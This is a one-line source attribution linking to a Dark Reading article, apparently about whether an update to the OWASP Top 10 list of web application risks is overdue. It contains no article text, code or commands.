Article source: http://www.darkreading.com/application-security/owasp-top-10-update-long-overdue-or-same-old-same-old/d/d-id/1328608?_mc=RSS_DR_EDT